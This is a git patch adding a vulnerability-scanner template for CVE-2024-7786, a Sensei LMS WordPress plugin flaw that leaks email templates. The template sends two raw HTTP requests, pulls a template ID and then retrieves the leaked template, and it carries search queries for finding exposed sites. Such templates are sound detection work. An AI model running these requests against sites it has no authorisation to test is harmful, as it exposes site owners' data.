From f7b09f525649ff270539cc70879560543d4e65e3 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 5 Sep 2024 19:49:32 +0300 Subject: [PATCH 1/2] add CVE-2024-7786 --- http/cves/2024/CVE-2024-7786.yaml | 71 +++++++++++++++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100755 http/cves/2024/CVE-2024-7786.yaml diff --git a/http/cves/2024/CVE-2024-7786.yaml b/http/cves/2024/CVE-2024-7786.yaml new file mode 100755 index 0000000000..c11f3647fe --- /dev/null +++ b/http/cves/2024/CVE-2024-7786.yaml @@ -0,0 +1,71 @@ +id: CVE-2024-7786 +info: + name: Sensei LMS < 4.24.2 - Email Template Leak + author: s4e-io + severity: high + description: | + The Sensei LMS WordPress plugin before 4.24.2 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak email templates. + reference: + - https://wpscan.com/vulnerability/f44e6f8f-3ef2-45c9-ae9c-9403305a548a/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-7786 + - https://www.usom.gov.tr/bildirim/tr-24-1387 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-7786 + epss-score: 0.00043 + epss-percentile: 0.09568 + metadata: + vendor: automattic + product: sensei-lms + framework: wordpress + publicwww-query: "/wp-content/plugins/sensei-lms" + tags: cve,cve2024,wpscan,wp-plugin,wordpress,sensei-lms,info-leak + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"id","date_gmt","slug")' + - 'contains(content_type,"application/json")' + - 'status_code == 200' + condition: and + internal: true + + extractors: + - type: json + part: body + name: template_id + json: + - '.[0].id' + internal: true + + - raw: + - | + GET /index.php/wp-json/wp/v2/sensei_email/{{template_id}} HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'sensei_email_preview_id={{template_id}}' + - 'media?parent={{template_id}}' + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200 From 265764d0d73a3565620c134d61cde509c6e1f7a2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 8 Sep 2024 22:21:47 +0400 Subject: [PATCH 2/2] Update CVE-2024-7786.yaml --- http/cves/2024/CVE-2024-7786.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-7786.yaml b/http/cves/2024/CVE-2024-7786.yaml index c11f3647fe..0a3bacd01c 100755 --- a/http/cves/2024/CVE-2024-7786.yaml +++ b/http/cves/2024/CVE-2024-7786.yaml @@ -1,4 +1,5 @@ id: CVE-2024-7786 + info: name: Sensei LMS < 4.24.2 - Email Template Leak author: s4e-io @@ -16,11 +17,14 @@ info: epss-score: 0.00043 epss-percentile: 0.09568 metadata: + max-request: 2 + verified: true vendor: automattic product: sensei-lms framework: wordpress publicwww-query: "/wp-content/plugins/sensei-lms" - tags: cve,cve2024,wpscan,wp-plugin,wordpress,sensei-lms,info-leak + fofa-query: body="/wp-content/plugins/sensei-lms" + tags: cve,cve2024,wpscan,wp,wp-plugin,wordpress,sensei-lms,exposure flow: http(1) && http(2)